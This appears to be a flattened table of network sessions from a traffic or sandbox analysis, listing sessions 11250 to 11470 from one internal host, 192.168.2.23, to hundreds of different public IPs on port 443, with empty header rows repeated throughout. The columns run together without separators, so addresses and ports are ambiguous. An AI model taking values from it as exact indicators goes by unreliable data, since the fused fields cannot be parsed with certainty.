                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11250192.168.2.233782482.212.31.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11251192.168.2.235514493.194.22.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11252192.168.2.235159875.135.11.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11253192.168.2.23578769.163.47.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11254192.168.2.23566385.59.22.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11255192.168.2.233720895.48.5.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11256192.168.2.233689438.49.192.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11257192.168.2.234068263.90.1.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11258192.168.2.2345158167.155.4.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11259192.168.2.2335620112.177.229.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11260192.168.2.2343394173.88.10.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11261192.168.2.2340344167.102.71.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11262192.168.2.2347458101.240.122.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11263192.168.2.235173891.39.212.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11264192.168.2.2340942180.220.98.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11265192.168.2.2332828113.9.204.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11266192.168.2.233856492.169.174.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11267192.168.2.233720412.103.79.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11268192.168.2.2350122117.187.93.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11269192.168.2.235823483.52.208.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11270192.168.2.235185093.13.197.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11271192.168.2.235064224.213.160.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11272192.168.2.2354900218.6.75.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11273192.168.2.2335738102.91.246.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11274192.168.2.2356790101.44.29.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11275192.168.2.2347616130.59.101.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11276192.168.2.2346550183.87.137.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11277192.168.2.2340210220.147.233.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11278192.168.2.2333608161.92.12.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11279192.168.2.233986680.5.150.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11280192.168.2.2360312135.53.33.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11281192.168.2.2339122177.58.40.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11282192.168.2.2351532218.120.250.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11283192.168.2.2341442165.225.79.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11284192.168.2.2352286133.243.134.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11285192.168.2.2343900211.209.91.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11286192.168.2.2341184104.185.98.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11287192.168.2.2346842165.94.185.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11288192.168.2.235450084.105.61.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11289192.168.2.2337390212.187.29.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11290192.168.2.2357058152.59.187.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11291192.168.2.235892444.93.175.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11292192.168.2.235890413.46.11.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11293192.168.2.2334610112.90.13.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11294192.168.2.233302483.138.225.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11295192.168.2.2355158217.108.139.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11296192.168.2.2358260213.76.12.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11297192.168.2.235781464.200.46.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11298192.168.2.2354922188.193.181.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11299192.168.2.235648494.185.212.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11300192.168.2.233811467.211.167.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11301192.168.2.2338180105.82.240.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11302192.168.2.2346532192.193.87.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11303192.168.2.234037859.101.154.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11304192.168.2.235506447.8.23.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11305192.168.2.2334092152.230.37.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11306192.168.2.2354840173.187.58.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11307192.168.2.2337048206.212.191.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11308192.168.2.233925246.78.63.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11309192.168.2.2354720189.11.189.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11310192.168.2.2339024119.153.122.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11311192.168.2.233567257.112.42.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11312192.168.2.2343790108.213.65.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11313192.168.2.2334652209.133.216.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11314192.168.2.2352860119.75.193.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11315192.168.2.2355638213.74.155.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11316192.168.2.2350738124.48.4.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11317192.168.2.2351600121.67.40.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11318192.168.2.234131818.106.161.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11319192.168.2.233391435.181.24.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11320192.168.2.2357056191.27.125.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11321192.168.2.2357744110.184.188.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11322192.168.2.2352006206.206.74.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11323192.168.2.235089888.125.228.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11324192.168.2.2337840212.254.150.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11325192.168.2.2344470128.11.72.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11326192.168.2.2354936203.237.157.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11327192.168.2.2354390159.116.130.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11328192.168.2.235794419.213.149.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11329192.168.2.2349594107.143.16.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11330192.168.2.2346178223.123.114.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11331192.168.2.2348666207.139.167.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11332192.168.2.2349598203.64.169.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11333192.168.2.234059050.152.163.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11334192.168.2.2344530199.225.181.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11335192.168.2.234894435.39.43.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11336192.168.2.2350318136.62.79.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11337192.168.2.2350688223.133.31.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11338192.168.2.2360048216.162.122.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11339192.168.2.2354090220.126.12.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11340192.168.2.2337108199.178.185.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11341192.168.2.2335522134.36.181.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11342192.168.2.2355804182.142.235.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11343192.168.2.2347702136.62.91.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11344192.168.2.2343284123.192.1.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11345192.168.2.2349316118.8.42.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11346192.168.2.235650831.140.112.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11347192.168.2.2340678139.34.5.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11348192.168.2.2347248147.226.17.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11349192.168.2.2353026181.134.17.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11350192.168.2.23451269.221.196.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11351192.168.2.235592812.102.225.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11352192.168.2.2350430168.136.98.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11353192.168.2.2346724108.91.242.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11354192.168.2.235993025.14.214.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11355192.168.2.2343006168.220.53.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11356192.168.2.235999076.193.220.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11357192.168.2.2338506153.108.195.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11358192.168.2.2346206194.229.47.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11359192.168.2.23341204.194.146.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11360192.168.2.234206836.56.149.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11361192.168.2.233456897.71.61.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11362192.168.2.234606696.48.204.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11363192.168.2.23479128.195.38.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11364192.168.2.2353908193.186.167.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11365192.168.2.2346998137.125.120.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11366192.168.2.2356582112.32.182.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11367192.168.2.233771090.223.19.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11368192.168.2.2359566162.215.97.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11369192.168.2.2334162173.211.21.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11370192.168.2.235640857.197.74.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11371192.168.2.234768871.126.201.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11372192.168.2.2358286176.98.69.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11373192.168.2.2344506195.223.57.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11374192.168.2.2353096143.229.214.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11375192.168.2.2351778196.26.63.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11376192.168.2.2339826121.178.219.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11377192.168.2.233491287.84.79.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11378192.168.2.2359190198.90.147.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11379192.168.2.234353869.95.180.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11380192.168.2.2348150164.16.108.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11381192.168.2.2356070121.22.179.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11382192.168.2.235654614.47.168.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11383192.168.2.234779619.122.107.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11384192.168.2.2345162142.213.212.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11385192.168.2.2345660124.43.199.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11386192.168.2.2337228209.104.184.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11387192.168.2.2343890134.80.166.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11388192.168.2.2333422153.198.199.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11389192.168.2.2360290106.45.204.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11390192.168.2.235773299.159.191.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11391192.168.2.233705661.200.232.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11392192.168.2.235614814.232.126.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11393192.168.2.233626467.102.217.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11394192.168.2.2351864111.181.65.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11395192.168.2.2341872166.43.118.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11396192.168.2.235993462.39.197.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11397192.168.2.234798090.92.67.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11398192.168.2.2354134161.184.168.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11399192.168.2.2334202151.22.232.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11400192.168.2.235846217.105.237.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11401192.168.2.235669827.136.46.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11402192.168.2.2357258106.68.149.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11403192.168.2.2342636133.194.94.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11404192.168.2.2347652147.210.249.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11405192.168.2.2349630220.188.196.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11406192.168.2.235875292.226.198.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11407192.168.2.2355692142.249.172.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11408192.168.2.2350786133.118.45.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11409192.168.2.2352550137.219.29.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11410192.168.2.2335260203.171.121.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11411192.168.2.2348668150.164.63.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11412192.168.2.2335354168.108.67.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11413192.168.2.2340508153.183.18.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11414192.168.2.2335284154.219.161.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11415192.168.2.2350918138.36.132.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11416192.168.2.2344948139.241.192.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11417192.168.2.234771434.246.227.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11418192.168.2.235222662.160.156.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11419192.168.2.234483461.160.217.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11420192.168.2.2334546175.138.122.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11421192.168.2.235693847.103.101.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11422192.168.2.2341862146.135.201.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11423192.168.2.2350702209.186.102.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11424192.168.2.2341394159.108.238.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11425192.168.2.2355272144.74.122.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11426192.168.2.2354028139.214.6.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11427192.168.2.233785445.128.76.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11428192.168.2.2359466168.42.132.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11429192.168.2.2360478159.189.56.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11430192.168.2.2353060117.192.151.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11431192.168.2.234125473.158.48.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11432192.168.2.2337076181.26.87.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11433192.168.2.2354838207.125.251.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11434192.168.2.233955698.243.36.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11435192.168.2.234612823.180.23.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11436192.168.2.2341766161.209.30.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11437192.168.2.2342568134.31.55.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11438192.168.2.235160441.83.131.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11439192.168.2.2340144204.113.17.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11440192.168.2.2344728222.189.224.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11441192.168.2.2346752112.133.35.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11442192.168.2.235838848.103.236.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11443192.168.2.2338144170.136.232.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11444192.168.2.235572214.199.179.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11445192.168.2.2359580142.176.223.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11446192.168.2.2342426222.114.228.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11447192.168.2.234959695.169.99.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11448192.168.2.2344180101.196.42.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11449192.168.2.2341456157.239.142.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11450192.168.2.234007031.142.56.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11451192.168.2.235703466.68.157.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11452192.168.2.235237888.32.16.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11453192.168.2.2345680110.160.90.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11454192.168.2.2351034173.4.130.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11455192.168.2.2357486173.251.122.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11456192.168.2.2341148169.216.15.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11457192.168.2.2356828143.231.162.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11458192.168.2.2356358157.49.62.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11459192.168.2.234303660.225.133.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11460192.168.2.2347680162.252.12.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11461192.168.2.2336174179.97.157.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11462192.168.2.235813619.216.205.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11463192.168.2.234456847.27.216.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11464192.168.2.2356902211.223.113.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11465192.168.2.2351688212.17.175.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11466192.168.2.233467292.135.224.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11467192.168.2.2338456103.125.133.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11468192.168.2.234898049.139.172.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11469192.168.2.234538091.111.115.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11470192.168.2.2336372104.151.40.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
